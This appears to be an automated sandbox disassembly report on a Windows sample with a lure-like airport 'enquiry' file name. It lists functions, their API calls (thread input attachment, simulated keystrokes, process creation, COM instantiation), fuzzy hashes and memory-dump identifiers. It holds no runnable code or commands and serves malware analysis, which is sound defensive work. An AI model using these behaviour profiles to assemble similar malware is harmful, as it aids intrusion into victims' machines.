            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
            • String ID:
            • API String ID: 2395222682-0
            • Opcode ID: af7b1bcb30527e515f42ffced28da45a678e242ac03bd9981dcc20fe018445cb
            • Instruction ID: bae85ebd3dc40c43ce7f59885445df92941c6e230d98e3f3d20bec7d657300a1
            • Opcode Fuzzy Hash: af7b1bcb30527e515f42ffced28da45a678e242ac03bd9981dcc20fe018445cb
            • Instruction Fuzzy Hash: ACC13571204309AFD740EF64C884A6AB7E9FF88748F10491DF68ADB251DB71ED49CB62
            APIs
            • __swprintf.LIBCMT ref: 00CE419D
            • __swprintf.LIBCMT ref: 00CE41AA
              • Part of subcall function 00CA38D8: __woutput_l.LIBCMT ref: 00CA3931
            • FindResourceW.KERNEL32(?,?,0000000E), ref: 00CE41D4
            • LoadResource.KERNEL32(?,00000000), ref: 00CE41E0
            • LockResource.KERNEL32(00000000), ref: 00CE41ED
            • FindResourceW.KERNEL32(?,?,00000003), ref: 00CE420D
            • LoadResource.KERNEL32(?,00000000), ref: 00CE421F
            • SizeofResource.KERNEL32(?,00000000), ref: 00CE422E
            • LockResource.KERNEL32(?), ref: 00CE423A
            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00CE429B
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
            • String ID:
            • API String ID: 1433390588-0
            • Opcode ID: f9be9ea416586cbed16a3dc42e84bb4f3145368ba6c5602b5c3b4dfbcd416d5e
            • Instruction ID: 960b2126122d81c15bd55790bbae0e4f6b318df27d03fdd83385f855f73cce66
            • Opcode Fuzzy Hash: f9be9ea416586cbed16a3dc42e84bb4f3145368ba6c5602b5c3b4dfbcd416d5e
            • Instruction Fuzzy Hash: 7E31DE71A0128AABCB15DF62DC48EBF7BACEF09301F104425FA15E6250E734DA119BB4
            APIs
            • GetCurrentThreadId.KERNEL32 ref: 00CE1700
            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00CE0778,?,00000001), ref: 00CE1714
            • GetWindowThreadProcessId.USER32(00000000), ref: 00CE171B
            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CE0778,?,00000001), ref: 00CE172A
            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CE173C
            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CE0778,?,00000001), ref: 00CE1755
            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CE0778,?,00000001), ref: 00CE1767
            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00CE0778,?,00000001), ref: 00CE17AC
            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00CE0778,?,00000001), ref: 00CE17C1
            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00CE0778,?,00000001), ref: 00CE17CC
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
            • String ID:
            • API String ID: 2156557900-0
            • Opcode ID: d9eda55e40e0f11bb7986eb8aa90c70f2f0ef4c185cfe27593de253e20decd87
            • Instruction ID: 90ddb54b6fd8b3092b359d7d02d6662c38301d26e373606e3b171c55c75db82b
            • Opcode Fuzzy Hash: d9eda55e40e0f11bb7986eb8aa90c70f2f0ef4c185cfe27593de253e20decd87
            • Instruction Fuzzy Hash: AE31BF79600344BBEB21DF16DC84B693BA9EF5AB51F254028FC14C63A0DB709E448B70
            APIs
            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C8FC06
            • OleUninitialize.OLE32(?,00000000), ref: 00C8FCA5
            • UnregisterHotKey.USER32(?), ref: 00C8FDFC
            • DestroyWindow.USER32(?), ref: 00CC4A00
            • FreeLibrary.KERNEL32(?), ref: 00CC4A65
            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CC4A92
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
            • String ID: close all
            • API String ID: 469580280-3243417748
            • Opcode ID: 936f17f2a77ebf2d409ec5975f853dda2c93ac5c4ecc97592c93b09ce90c0a39
            • Instruction ID: 173f9ca908fae557daa0679a131d51a14615102205f5e5e465a1bdc2dbb3a124
            • Opcode Fuzzy Hash: 936f17f2a77ebf2d409ec5975f853dda2c93ac5c4ecc97592c93b09ce90c0a39
            • Instruction Fuzzy Hash: 93A17C347012128FCB28EF55C4A5F69F7A4AF04704F1482ADE91AAB251DB30EE17EF58
            APIs
            • EnumChildWindows.USER32(?,00CDAA64), ref: 00CDA9A2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ChildEnumWindows
            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
            • API String ID: 3555792229-1603158881
            • Opcode ID: 61f13547f39a36b3cc15fe95794db42dcf3e486b445cb81f3a2f60623dfa34a1
            • Instruction ID: dcb0366d9c69b2152a85f8cc4acb0af08b8c209687ee67bc324a2792c4099a15
            • Opcode Fuzzy Hash: 61f13547f39a36b3cc15fe95794db42dcf3e486b445cb81f3a2f60623dfa34a1
            • Instruction Fuzzy Hash: 6891EA71A00506DBDB08DF70C491BEDFB75BF04304F50811AE999A7351DF30AA59DBA1
            APIs
            • SetWindowLongW.USER32(?,000000EB), ref: 00C82EAE
              • Part of subcall function 00C81DB3: GetClientRect.USER32(?,?), ref: 00C81DDC
              • Part of subcall function 00C81DB3: GetWindowRect.USER32(?,?), ref: 00C81E1D
              • Part of subcall function 00C81DB3: ScreenToClient.USER32(?,?), ref: 00C81E45
            • GetDC.USER32 ref: 00CBCF82
            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00CBCF95
            • SelectObject.GDI32(00000000,00000000), ref: 00CBCFA3
            • SelectObject.GDI32(00000000,00000000), ref: 00CBCFB8
            • ReleaseDC.USER32(?,00000000), ref: 00CBCFC0
            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00CBD04B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
            • String ID: U
            • API String ID: 4009187628-3372436214
            • Opcode ID: 5a97d548cdcb18c865f715d2638f664adebb69a226faa888905298ad8e80c532
            • Instruction ID: 6b6e221ab06499f1fa2d0e4f22289484f6c39e6ab0532c4a62569efb747d044c
            • Opcode Fuzzy Hash: 5a97d548cdcb18c865f715d2638f664adebb69a226faa888905298ad8e80c532
            • Instruction Fuzzy Hash: 1471E530400205DFCF21EF64C884AFA3BB5FF49365F1442AAED669A2A5D7318D41DB65
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
              • Part of subcall function 00C82344: GetCursorPos.USER32(?), ref: 00C82357
              • Part of subcall function 00C82344: ScreenToClient.USER32(00D467B0,?), ref: 00C82374
              • Part of subcall function 00C82344: GetAsyncKeyState.USER32(00000001), ref: 00C82399
              • Part of subcall function 00C82344: GetAsyncKeyState.USER32(00000002), ref: 00C823A7
            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00D0C2E4
            • ImageList_EndDrag.COMCTL32 ref: 00D0C2EA
            • ReleaseCapture.USER32 ref: 00D0C2F0
            • SetWindowTextW.USER32(?,00000000), ref: 00D0C39A
            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00D0C3AD
            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00D0C48F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
            • String ID: @GUI_DRAGFILE$@GUI_DROPID
            • API String ID: 1924731296-2107944366
            • Opcode ID: 9c41dfe878090fe977207a561ed8235c3c1eb121ab83d34adcc63b691e5f36e7
            • Instruction ID: 3ba02261a28f80ad42f08f1a39300a1be0447ede19d3c8c0133d7f9df7875db8
            • Opcode Fuzzy Hash: 9c41dfe878090fe977207a561ed8235c3c1eb121ab83d34adcc63b691e5f36e7
            • Instruction Fuzzy Hash: E6519D74204300AFD714EF10C895FAA77E4FB89314F14461DF596872E1DB71E948DB62
            APIs
            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00D0F910), ref: 00CF903D
            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00D0F910), ref: 00CF9071
            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CF91EB
            • SysFreeString.OLEAUT32(?), ref: 00CF9215
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Free$FileLibraryModuleNamePathQueryStringType
            • String ID:
            • API String ID: 560350794-0
            • Opcode ID: df6d0f4170718a8e4ebd35323e80c9ce520962aad82e348a6218aec5312bfdf5
            • Instruction ID: 56c4da879c4170cfc584f0d2aa87595948a917b3345430b3353a3e60b24ca66f
            • Opcode Fuzzy Hash: df6d0f4170718a8e4ebd35323e80c9ce520962aad82e348a6218aec5312bfdf5
            • Instruction Fuzzy Hash: 6EF10871A00209AFDF54DF94C888EBEB7B9FF89314F108059F616AB260DB31AE45CB51
            APIs
            • _memset.LIBCMT ref: 00CFF9C9
            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CFFB5C
            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CFFB80
            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CFFBC0
            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CFFBE2
            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CFFD5E
            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00CFFD90
            • CloseHandle.KERNEL32(?), ref: 00CFFDBF
            • CloseHandle.KERNEL32(?), ref: 00CFFE36
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
            • String ID:
            • API String ID: 4090791747-0
            • Opcode ID: 268b53b891b4a1ecd35cdcef1db9d9f83e9dca1b5e31207ae1eddceaebeeb535
            • Instruction ID: fdbe6c9acd7375932a254b86563dbf2aa6c4824a48f35542947ebb91795b7e5a
            • Opcode Fuzzy Hash: 268b53b891b4a1ecd35cdcef1db9d9f83e9dca1b5e31207ae1eddceaebeeb535
            • Instruction Fuzzy Hash: 7EE1B2312043459FC724EF24C891B7ABBE0EF85354F18846DF9998B2A2DB31ED46DB52
            APIs
              • Part of subcall function 00CE48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CE38D3,?), ref: 00CE48C7
              • Part of subcall function 00CE48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CE38D3,?), ref: 00CE48E0
              • Part of subcall function 00CE4CD3: GetFileAttributesW.KERNEL32(?,00CE3947), ref: 00CE4CD4
            • lstrcmpiW.KERNEL32(?,?), ref: 00CE4FE2
            • _wcscmp.LIBCMT ref: 00CE4FFC
            • MoveFileW.KERNEL32(?,?), ref: 00CE5017
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
            • String ID:
            • API String ID: 793581249-0
            • Opcode ID: 26c2301d7ba1687fcf6308b9856b7709e3ac883a922ff75409fedaeab17f57fc
            • Instruction ID: aa36c96a91716bab05b44397b22d80ace04287e184811c93406c57fed9484bbc
            • Opcode Fuzzy Hash: 26c2301d7ba1687fcf6308b9856b7709e3ac883a922ff75409fedaeab17f57fc
            • Instruction Fuzzy Hash: 935175B20087859BC724EBA5CC819DFB3ECAF85344F10092EF599D3191EF74E6889766
            APIs
            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00D0896E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: InvalidateRect
            • String ID:
            • API String ID: 634782764-0
            • Opcode ID: cdb688926bf46cfc0564f950312cde54e16bcaacd93ea8057dcc357bd8ca7025
            • Instruction ID: 36ebdef46e37042387fa6d9e6f437c137e0b2c63c444742e917faf716322d697
            • Opcode Fuzzy Hash: cdb688926bf46cfc0564f950312cde54e16bcaacd93ea8057dcc357bd8ca7025
            • Instruction Fuzzy Hash: E4517430A00308BBDF309F28DC89BA97B65FB15324F644116F599E66E1DF71E980AB71
            APIs
            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00CBC547
            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CBC569
            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00CBC581
            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00CBC59F
            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00CBC5C0
            • DestroyIcon.USER32(00000000), ref: 00CBC5CF
            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00CBC5EC
            • DestroyIcon.USER32(?), ref: 00CBC5FB
              • Part of subcall function 00D0A71E: DeleteObject.GDI32(00000000), ref: 00D0A757
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
            • String ID:
            • API String ID: 2819616528-0
            • Opcode ID: 497d6e04c8abb3f3f05fc0e9c7c3e12d800c9b4140676e560e02f1d915232045
            • Instruction ID: 48651461c52616c109365196d74b913903b972c0f050d6bf719b91b183292db3
            • Opcode Fuzzy Hash: 497d6e04c8abb3f3f05fc0e9c7c3e12d800c9b4140676e560e02f1d915232045
            • Instruction Fuzzy Hash: CD516974600309AFDB24EF25CC89FAA77B5EB54314F100528F916D76A0DB70EE90EB60
            APIs
              • Part of subcall function 00CDAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CDAE77
              • Part of subcall function 00CDAE57: GetCurrentThreadId.KERNEL32 ref: 00CDAE7E
              • Part of subcall function 00CDAE57: AttachThreadInput.USER32(00000000,?,00CD9B65,?,00000001), ref: 00CDAE85
            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CD9B70
            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00CD9B8D
            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00CD9B90
            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CD9B99
            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00CD9BB7
            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00CD9BBA
            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CD9BC3
            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00CD9BDA
            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00CD9BDD
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
            • String ID:
            • API String ID: 2014098862-0
            • Opcode ID: 7e01b60d51d2bf624f5fe52cbe4ad76a08a66b47487e53f43875bcc5c94fe61d
            • Instruction ID: fa6f88c3bb2ce96f10a98a020a9ddd9757990b25001cd6e8c6c984d293bbf69c
            • Opcode Fuzzy Hash: 7e01b60d51d2bf624f5fe52cbe4ad76a08a66b47487e53f43875bcc5c94fe61d
            • Instruction Fuzzy Hash: 5F11E171550718BFF6206B60DC89F6A7B2DEB4C751F610426F348AB6A0CAF35C10DAB4
            APIs
            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00CD8A84,00000B00,?,?), ref: 00CD8E0C
            • HeapAlloc.KERNEL32(00000000,?,00CD8A84,00000B00,?,?), ref: 00CD8E13
            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00CD8A84,00000B00,?,?), ref: 00CD8E28
            • GetCurrentProcess.KERNEL32(?,00000000,?,00CD8A84,00000B00,?,?), ref: 00CD8E30
            • DuplicateHandle.KERNEL32(00000000,?,00CD8A84,00000B00,?,?), ref: 00CD8E33
            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00CD8A84,00000B00,?,?), ref: 00CD8E43
            • GetCurrentProcess.KERNEL32(00CD8A84,00000000,?,00CD8A84,00000B00,?,?), ref: 00CD8E4B
            • DuplicateHandle.KERNEL32(00000000,?,00CD8A84,00000B00,?,?), ref: 00CD8E4E
            • CreateThread.KERNEL32(00000000,00000000,00CD8E74,00000000,00000000,00000000), ref: 00CD8E68
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
            • String ID:
            • API String ID: 1957940570-0
            • Opcode ID: 076fd47e3472884acb249f6e0c154e00182208f74203b8fcc51d1d91dd5f3b7e
            • Instruction ID: ab1666b19f8d26664efc1bb18326e43c69899fc1c198ff99b6fcca76a0928f48
            • Opcode Fuzzy Hash: 076fd47e3472884acb249f6e0c154e00182208f74203b8fcc51d1d91dd5f3b7e
            • Instruction Fuzzy Hash: BC01A8B5240308FFE620ABA5DC49F6B3BACEB89711F104425FA09DB6A1CA7098008A31
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Variant$ClearInit$_memset
            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
            • API String ID: 2862541840-625585964
            • Opcode ID: 9a23a248c0bdcfcb4adc18c62115c314af3682aee43daa409a67a24ce50c2d1b
            • Instruction ID: ec34e63f24e35a87fb20a2b79a56a55b24eb169d1bfb88e5e432e29560edc737
            • Opcode Fuzzy Hash: 9a23a248c0bdcfcb4adc18c62115c314af3682aee43daa409a67a24ce50c2d1b
            • Instruction Fuzzy Hash: BF91CD70A00209AFDFA4DFA5C848FAEBBB8EF45310F108119F615EB290D7709A45CFA1
            APIs
              • Part of subcall function 00CD7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CD758C,80070057,?,?,?,00CD799D), ref: 00CD766F
              • Part of subcall function 00CD7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CD758C,80070057,?,?), ref: 00CD768A
              • Part of subcall function 00CD7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CD758C,80070057,?,?), ref: 00CD7698
              • Part of subcall function 00CD7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CD758C,80070057,?), ref: 00CD76A8
            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00CF9B1B
            • _memset.LIBCMT ref: 00CF9B28
            • _memset.LIBCMT ref: 00CF9C6B
            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00CF9C97
            • CoTaskMemFree.OLE32(?), ref: 00CF9CA2
            Strings
            • NULL Pointer assignment, xrefs: 00CF9CF0
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
